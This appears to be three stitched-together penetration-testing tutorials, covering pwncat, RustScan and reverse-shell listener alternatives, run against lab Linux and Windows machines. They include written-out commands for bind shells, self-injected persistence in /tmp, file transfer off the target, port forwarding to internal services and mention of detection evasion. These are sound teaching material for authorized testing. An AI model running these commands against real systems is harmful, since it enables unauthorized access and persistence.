A Detailed Guide on Pwncat

Pwncat is an open-source Python tool that serves as a modern alternative to the traditional netcat utility. Built for network exploration, exploitation and penetration testing, it pairs a user-friendly interface with a comprehensive feature set, making it easy to interact with network services during reconnaissance and vulnerability assessment.

The official documentation for this tool is available at: https://pwncat.org/

Table of Contents

· Lab Setup
· Installation
· Usage
  o Port Scanning and Banner Grabbing
  o As a Listener
  o Bind Shell (Linux)
  o Reverse Shell (Windows)
  o Local Port Forwarding
  o To Send/Receive Files
· Advantages over Netcat
· Conclusion

Lab Setup

In this article, we show the usage of pwncat against both Linux and Windows target machines:

Target Machines: Ubuntu (192.168.1.23), Windows (192.168.1.4)

Attacker Machine: Kali Linux (192.168.1.7)

Installation

Installation of pwncat can be done using pip or apt.

To install using apt use the following command:

apt install pwncat

To install using pip use the following command:

pip install pwncat

Usage

Port Scanning and Banner Grabbing

Pwncat performs a port scan when given the -z (zero-I/O) flag, a target and a port range; adding the --banner flag also grabs the banner from every open port.

pwncat -z 192.168.1.23 1-100

pwncat -z 192.168.1.23 1-100 --banner

Pwncat is not limited to TCP: adding the -u flag to the above command scans UDP ports instead.

As a Listener

When used as a listener with --self-inject, pwncat keeps persistence by creating a file in the target's /tmp/ directory. If the connection is lost, the reverse shell can therefore be obtained again on the same port that was used before.

pwncat -l 1234 --self-inject /bin/bash:192.168.1.7:1234

The persistence can be checked by running an rlwrap listener on the same port after terminating the above connection.

Pwncat can also create persistence on multiple ports at once, using the following command:

pwncat -l 1234 --self-inject /bin/bash:192.168.1.7:1234+2

It can be observed that, along with port 1234, the reverse shell can also be obtained on ports 1235 and 1236.

Reverse Shell (Windows)

A reverse shell payload for the Windows machine can be generated from the reverse shell generator (https://www.revshells.com/).

Before executing the command copied from revshells.com, start a listener on port 4444 on the kali machine using the following command:

pwncat -l 4444

Local Port Forwarding

Install pwncat inside the Ubuntu machine using the following command:

pip3 install pwncat

After a reverse shell has been obtained as described in the As a Listener section, it is observed that an application is running internally on the Ubuntu machine on port 8080. To reach that web application from the kali machine, local port forwarding is set up with the following command (run on the Ubuntu machine):

pwncat -L 0.0.0.0:5000 127.0.0.1 8080

After executing the above command, the web application can be accessed from the kali machine at the URL http://192.168.1.23:5000

Send and Receive Files

Besides the uses discussed above, pwncat can also send and receive files. Again this requires pwncat to be installed on the Ubuntu machine.

Create a file named data.txt on the Ubuntu machine, then start a listener on the kali machine where the file is to be received.

To receive the file on the kali machine, the following command can be used:

pwncat -l 6666 > data.txt

Once the listener is active, the following command on the Ubuntu machine transfers the file to the kali machine:

pwncat 192.168.1.7 6666 < data.txt

Bind Shell (Linux)

To get a bind shell, run the following on the kali machine; it connects to port 9874 on the Ubuntu machine:

pwncat 192.168.1.23 9874

Inside the Ubuntu machine, type the following command:

pwncat -l -e '/bin/bash' 9874 -k

It can be observed that the bind shell connection is obtained on the kali machine. Because of the -k flag used above, the bind shell keeps listening and accepts a new client as soon as the previous one disconnects.

The same procedure also works over UDP ports by adding the -u flag to the commands.

Advantages over Netcat

Pwncat, a feature-rich netcat-like tool designed for pentesters and red teamers, offers several enhancements over traditional Netcat:

  • Interactive Shell
  • Scriptable Interface
  • Encrypted Communication
  • Persistence

Pwncat provides an interactive shell with syntax highlighting and command completion, improving the user experience. Pentesters can automate tasks using Pwncat's Python scripting interface, allowing for greater flexibility and customization. It also supports encrypted communication channels, ensuring confidentiality when interacting with compromised systems.

Conclusion

In conclusion, pentesters and red teamers can choose from many tools to obtain reverse shells and bind shells, upload and download files, set up local port forwarding and more. If pwncat is adopted in regular practice, however, it can prove to be a very valuable and time-saving tool.

A Detailed Guide on RustScan

In the realm of cybersecurity, network scanning tools play a vital role in reconnaissance and vulnerability assessment. Among the array of options available, Rustscan has emerged as a formidable contender, offering speed, efficiency, and versatility that distinguish it from traditional tools like Nmap.

Table of Contents

· What sets Rustscan apart?
· Advantages of Rustscan over Nmap
· Usage (Docker)
· Installation and Usage (Standalone)
· Rustscan flags
· Conclusion

What sets Rustscan apart?

Rustscan is an open-source network scanner developed in the Rust programming language. Its lightweight design, optimized algorithms, and user-friendly interface make it a preferred choice for both penetration testers and security professionals.

Advantages of Rustscan over Nmap

Speed: Rustscan is renowned for its rapid scanning capabilities. Its multithreaded architecture and optimized algorithms enable it to scan large networks significantly faster than traditional scanners like Nmap.

Efficiency: It prioritizes efficiency, utilizing resources intelligently and minimizing overhead. This ensures that scanning tasks are completed swiftly without excessive resource consumption.

Ease of Use: With its intuitive interface and simplified command structure, Rustscan is accessible to users of all levels of expertise. Its design minimizes the learning curve typically associated with network scanning tools.

Versatility: It offers a broad range of features and customization options, allowing users to tailor their scans to specific requirements. Whether performing basic port scanning or comprehensive service enumeration, Rustscan delivers.

Usage (Docker)

Rustscan can be run from a Docker image. The installation guide is available here: https://github.com/RustScan/RustScan/wiki/Installation-Guide

To install docker use the command:

apt install docker.io

After docker is installed, rustscan can be run with the following command:

docker run -it --rm --name rustscan rustscan/rustscan:2.1.1 -a 192.168.1.7

Installation and Usage (Standalone)

Rustscan can be installed using cargo with the following commands:

apt install cargo

cargo install rustscan

Make sure to add /root/.cargo/bin to the PATH. Check which shell is in use and edit its startup file:

echo $SHELL

nano .zshrc

Add an export PATH line that includes /root/.cargo/bin.

Once installed, Rustscan is ready to run.

Rustscan flags

There are a number of operations that can be performed with Rustscan; the flags for each are listed below.

-a : scans the given address; with no port options, all TCP ports are scanned.

rustscan -a 192.168.1.7

--ulimit : adjusts the ulimit for file descriptors to handle large-scale scans. If the scan is running slowly, adding this flag with a value of 5000 will make it run faster.

rustscan -a 192.168.1.7 --ulimit 5000

-p : defines specific ports to be scanned.

rustscan -a 192.168.1.7 -p 21,22,23

-r : performs a range scan; only the given range of ports is scanned.

rustscan -a 192.168.1.7 -r 21-50

-- -sC -sV : everything after -- is handed to Nmap; -sC runs the default scripts and -sV detects service versions.

rustscan -a 192.168.1.7 -- -sC -sV

Results of the service version and default script scan can be seen below.

Rustscan can also scan an entire subnet by adding /24 after the IP address.

rustscan -a 192.168.1.0/24

-g : enables the "greppable" output format for easy parsing and analysis.

rustscan -a 192.168.1.7 -g

--accessible : turns on accessible mode, which does not print ASCII art or very large blocks of text, as these can cause pain with screen readers. This reduces the information you get.

rustscan -a 192.168.1.7 --accessible

Conclusion

Rustscan represents a significant advancement in network scanning. Its speed, efficiency, and versatility make it an invaluable tool for cybersecurity professionals. Whether conducting routine network audits or hunting for vulnerabilities, Rustscan is a must-have in your toolkit.

Best Alternative of Netcat Listener

Pentesters rely on a variety of tools to establish connections and maintain access during security assessments. One critical component of their toolkit is the listener: a program that waits for incoming connections and facilitates communication with compromised systems.

In this blog post, we'll look at different listener options, exploring the features and use cases of popular tools such as Netcat, Rlwrap, Rustcat, Pwncat and the Windows ConPty shell.

Table of Contents

· Reverse Shell Generator
· Netcat for Beginners
· Rlwrap for OSCP
· Rustcat for OSCP
· Pwncat for Red Teamers
· Windows ConPty for OSCP & Red Teamers

Reverse Shell Generator

To generate a reverse shell, https://www.revshells.com/ can be used: it provides a number of reverse shell and listener commands for each OS, which is ideal in a remote command execution scenario.

There are, however, many other online and offline techniques for generating reverse shells; read our previous blog, "Easy way to Generate Reverse Shell".

Netcat

Netcat, often dubbed the "Swiss Army knife of networking," is a versatile tool for creating simple TCP and UDP connections. Its minimalist design and broad functionality make it a favorite among pentesters. Key features include:

· Basic Connectivity
· Port Scanning
· File Transfer
· Remote Shell Access

A netcat listener is started on port 4444 on the kali machine with the following command:

nc -lnvp 4444

After generating the command from the reverse shell generator, the reverse shell command is run on the Ubuntu OS.

After running the above command on the Ubuntu OS, a reverse shell is obtained on the kali machine.

Limitation: However, it is observed that after pressing the up arrow key to reuse the previous command, the terminal does not complete the command.

rlwrap for OSCP

rlwrap, short for "readline wrapper", enhances the usability of command-line interfaces. While not a dedicated listener tool, it improves the experience of interacting with shell-based tools like Netcat through:

· Command Line History
· Autocompletion

Benefits of rlwrap over Netcat

rlwrap adds command history and editing capabilities to Netcat sessions, simplifying command recall and modification. Pentesters benefit from rlwrap's tab-completion feature, speeding up command entry by suggesting possible completions based on the current input.

Installation of rlwrap is simple; just use the following command:

apt install rlwrap

After installation, repeat the entire process followed in the netcat section, but use the following listener command so that the reverse shell runs under rlwrap:

rlwrap nc -lvnp 4444

Advantage: Observe that after the reverse shell is obtained, commands can be autocompleted and reused.

Rustcat for OSCP

Rustcat, a modern reimplementation of Netcat in the Rust programming language, aims to provide improved performance and security while retaining Netcat's functionality. Key reasons for its adoption include:

· Serves its purpose of listening on ports
· Grabs history
· User-friendly
· Supports UDP
· Uses colors

Rustcat leverages Rust's memory safety features, reducing the likelihood of common vulnerabilities such as buffer overflows. Its design enables concurrent connections, allowing pentesters to handle multiple sessions efficiently. Like Netcat, Rustcat is available on multiple platforms, ensuring compatibility across different operating systems.

Rustcat can be installed using cargo with the following commands:

apt install cargo

cargo install rustcat

Make sure to add /root/.cargo/bin to the PATH. Check which shell is in use and edit its startup file:

echo $SHELL

nano .zshrc

Add an export PATH line that includes /root/.cargo/bin.

After installation, repeat the entire process followed in the netcat section, but use the following listener command so that the reverse shell is received by rustcat:

rcat listen -ib 1234

Advantage: Observe that tab completion is enabled in rcat and can be used to autocomplete commands.

It also has more dynamic features, such as UDP connections (-lpu) and a history function (-lpH).

Pwncat for Red Teamers

Pwncat, a feature-rich netcat-like tool designed for pentesters and red teamers, offers several enhancements over traditional Netcat:

· Interactive Shell
· Scriptable Interface
· Encrypted Communication
· Persistence

Pwncat provides an interactive shell with syntax highlighting and command completion, improving the user experience. Pentesters can automate tasks using Pwncat's Python scripting interface, allowing for greater flexibility and customization. It also supports encrypted communication channels, ensuring confidentiality when interacting with compromised systems.

Pwncat can be installed using pip with the following command:

pip install pwncat

After installation, repeat the entire process followed in the netcat section, but use the following listener command so that the reverse shell is received by pwncat:

pwncat -l 1234 --self-inject /bin/bash:192.168.1.7:1234

Advantage: Observe that pwncat keeps persistence by creating a file in the target's /tmp/ directory. If the connection is lost, the reverse shell can therefore be obtained again on the same port that was used before.

The persistence can be checked by running an rlwrap listener on the same port after terminating the above connection.

Pwncat can also create persistence on multiple ports at once, using the following command:

pwncat -l 1234 --self-inject /bin/bash:192.168.1.7:1234+2

It can be observed that, along with port 1234, the reverse shell can also be obtained on ports 1235 and 1236.

Windows ConPty Shell

The Windows ConPty shell, a more recent addition to the pentester's arsenal, leverages the ConPty functionality introduced in Windows 10. It offers several advantages over traditional shells:

· Improved TTY
· Stability and Compatibility
· Evasion Techniques

The ConPty shell provides improved TTY functionality, allowing for a more interactive experience, including proper handling of command line utilities like Vim and Python.

Advantage: It is more stable and compatible with modern Windows systems, providing a reliable option for post-exploitation activities. Pentesters can utilize the ConPty shell to bypass security mechanisms by avoiding traditional detection methods.

The reverse shell generator can be used for both the listener command and the reverse shell payload.

To start the listener on port 443 on the kali machine, the command can be taken from the reverse shell generator website.

Now run the reverse shell payload copied from the reverse shell generator on the Windows machine.

Observe that the reverse shell is obtained on port 443 and it is a fully interactive session.

Conclusion

In conclusion, pentesters have a diverse range of listener options available, each offering unique features and benefits. Whether it's the simplicity of Netcat, the usability enhancements of Rlwrap, the performance and security of Rustcat, the advanced capabilities of Pwncat, or the modern functionality of the Windows ConPty shell, selecting the right tool depends on the specific requirements of the assessment.

By understanding the strengths and weaknesses of these tools, pentesters can effectively establish and maintain access during security engagements.